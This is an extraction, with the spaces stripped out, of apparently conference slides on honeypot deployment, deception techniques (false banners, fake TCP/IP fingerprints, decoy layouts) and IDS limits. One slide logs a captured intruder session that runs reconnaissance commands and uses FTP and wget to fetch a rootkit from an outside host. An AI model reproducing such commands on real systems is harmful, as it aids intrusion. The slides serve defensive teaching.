Академический Документы
Профессиональный Документы
Культура Документы
HoneypotAdvantages& Disadvantages
IntelligenceGathering
IntelligenceGathering
#cd/;lsalF;w;unamea;id #ftpftp.0catch.com #ls #ftp #open #ftp.0catch.com #rootkit.0catch.com #szopol #ls #passwdroot #wget
# #
PerceptionManagement
Battlefielddeceptionconsistsofthose operationsconductedatechelonstheater (Armycomponent)andbelowwhich purposelymisleadenemydecisionmakers by *Distortion. *Concealment: *Falsificationofindicatorsoffriendly intentions,capabilities,ordispositions. USArmyFM902
Honeypot Best Practices
PerceptionManagement
PerceptionManagement FalseBanners
PerceptionManagement FalseBanners
PerceptionManagement FalseTCP/IPStacks
#wwww:ttt:mmm:D:W:S:N:I:OSDescription # #wwwwwindowsize #ttttimetolive #mmmmaximumsegmentsize #Ddon' tfragmentflag(0=unset,1=set) #Wwindowscaling(1=notpresent, other=value) #SsackOKflag(0=unset,1=set) #Nnopflag(0=unset,1=set) #Ipacketsize(1=irrevelant)
Honeypot Best Practices
PerceptionManagement FalseTCP/IPStacks
#wwww:ttt:mmm:D:W:S:N:I:OSDescription 5840:128:536:1:0:1:1:48:Windows95(3) 16060:64:1460:1:0:1:1:60:Debian/CalderaLinux 2.2.x 8760:255:1380:1:0:0:0:44:Solaris2.7
PerceptionManagement Decoys,Honeypots,Honeynets
EngineeringDeception
EngineeringDeception ExposedDecoys
Honeypot WWW WWW
Honeypot SMTP/DNS
SMTP /DNS
EngineeringDeception InterleavedDecoys
DMZ
Honeypot WWW Host HP
Host
Host
EngineeringDeception LateralDecoys
HP HP HP
10.2.8.0/22
HP
HP HP HP Host Host
WWW
10.2.4.0/22
SMTP /DNS
EngineeringDeception
ProductionHoneypots
EngineeringDeception
ResearchHoneypots
SecurityAlliances
Isn' tNetworkIDSenough?
[**][1:618:2]SCANSquidProxyattempt[**] [Classification:AttemptedInformationLeak][Priority:2] 11/0408:09:27.772993216.218.184.2:3704>10.2.87.142:3128 TCPTTL:49TOS:0x0ID:35607IpLen:20DgmLen:44DF ******S*Seq:0x13C82726Ack:0x0Win:0x4000TcpLen:24 TCPOptions(1)=>MSS:1412 [**][100:1:1]spp_portscan:PORTSCANDETECTEDfrom 216.218.184.2(THRESHOLD4connectionsexceededin0 seconds)[**] 11/0420:19:09.882416 SnortNetworkIntrusionDetectionSystemalert http://www.snort.org
Isn' tNetworkIDSenough?
GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/3128/1 0287142HTTP/1.0 Connection:close Pragma:nocache Accept:text/html Host:216.218.184.9 UserAgent:Mozilla/4.0(compatible;MSIE5.5;AOL5.0; Windows98) CLIENTIP:10.2.87.142 XFORWARDEDFOR:10.2.87.142 Tiny Honeypot log
Isn' tNetworkIDSenough?
GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/81/10 287142HTTP/1.0 Connection:close Pragma:nocache Accept:text/html Host:216.218.184.9 UserAgent:Mozilla/4.0(compatible;MSIE5.5;AOL5.0; Windows98) CLIENTIP:10.2.87.142 XFORWARDEDFOR:10.2.87.142 Tiny Honeypot log
if($value=="high"){$cost= "high"}
Deploymentcosts Analysiscosts Potentialforgreaterrisk
HoneypotAdvantages& Disadvantages
George Bakos - gbakos@ists.dartmouth.edu Jay Beale - jay@bastille-linux.org